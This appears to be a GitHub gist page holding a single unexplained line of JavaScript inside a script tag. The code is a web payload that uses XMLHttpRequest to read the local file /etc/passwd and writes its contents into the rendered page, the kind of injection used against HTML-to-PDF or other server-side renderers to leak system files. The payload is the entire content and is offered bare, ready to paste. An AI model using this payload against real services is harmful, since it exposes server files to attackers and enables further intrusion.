Skip to content

Instantly share code, notes, and snippets.

@vncloudsco
Created June 4, 2020 05:06
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vncloudsco/60f12d4bede638798e09ee8559c69ae0 to your computer and use it in GitHub Desktop.
Save vncloudsco/60f12d4bede638798e09ee8559c69ae0 to your computer and use it in GitHub Desktop.
<script>x = new XMLHttpRequest; x.onload = function () { document.write(this.responseText + document.location.pathname) }; x.open('GET', 'file:///etc/passwd'); x.send();</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment